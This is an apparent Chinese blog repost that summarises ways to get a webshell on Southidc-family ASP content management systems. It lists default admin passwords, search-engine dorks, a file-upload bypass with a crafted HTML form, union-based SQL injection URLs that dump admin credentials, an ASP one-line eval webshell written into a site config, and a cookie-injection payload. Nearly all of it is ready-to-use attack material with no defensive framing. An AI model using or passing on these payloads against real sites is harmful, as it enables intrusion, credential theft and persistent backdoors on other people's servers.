zoukankan      html  css  js  c++  java

  • 南方数据管理系统拿shell(一个小小的总结)

    默认:

    admin admin
    admin  admin888
    'or'='or'
    默认数据库Databases/079lidc.mdb

    改样式上传:http://www.yangtong.com/admin/southidceditor/admin_style.asp

    抓包 明小子上传
     

    注:通杀南方数据 良精系统 网软天下等

    http://www.xxx.cn/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='

    w78cms网站管理系统
    关键词   inurl:ShopMore.asp?id
    利用页面 /admin/ewebeditor/admin 默认账号密码  admin     198625

    关键词:inurl:alogin.asp
    木马上传后缀:asp;.asp.jpg
    admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp


     

    1.通过upfile_other.asp漏洞文件直接取SHELL
    直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
    <HTML><HEAD>
    <META http-equiv=Content-Type content="text/html; charset=gb2312">
    <STYLE type=text/css>BODY {
    FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
    }
    .tx1 {
    BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
    }
    </STYLE>

    <META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
    <BODY leftMargin=0 topMargin=0>
    <FORM name=form1 action="http://www.target.com/upfile_Other.asp"; method=post
    encType=multipart/form-data><INPUT class="tx1" type=file size=30 name=FileName> <INPUT class="tx1" type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
    <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
    将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer asa或asp文件上传,后面需要加一个空格

    2.Sql注入
    http://www.target.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
    以上代码直接暴管理员帐号和密码,取SHELL方法如下:
    在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入
    "%><%eval(request(chr(35)))%><%'
    成功把shell写入http://www.target.com/inc/config.asp
    这里一句话chr(32)密码是"#"

    3.cookie注入
    清空地址栏,利用union语句来注入,提交:
    javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
    用刺猬大哥的cookie注入转换工具亦可

  • 相关阅读:
    Codeforces Round #249 (Div. 2) D. Special Grid 枚举
    图论二
    C语言中的atan和atan2(转)
    BestCoder Round #79 (div.2)
    数学
    LCA
    二分图
    动态规划
    线段树
    树状数组
  • 原文地址:https://www.cnblogs.com/demonspider/p/2561102.html
Copyright © 2011-2022 走看看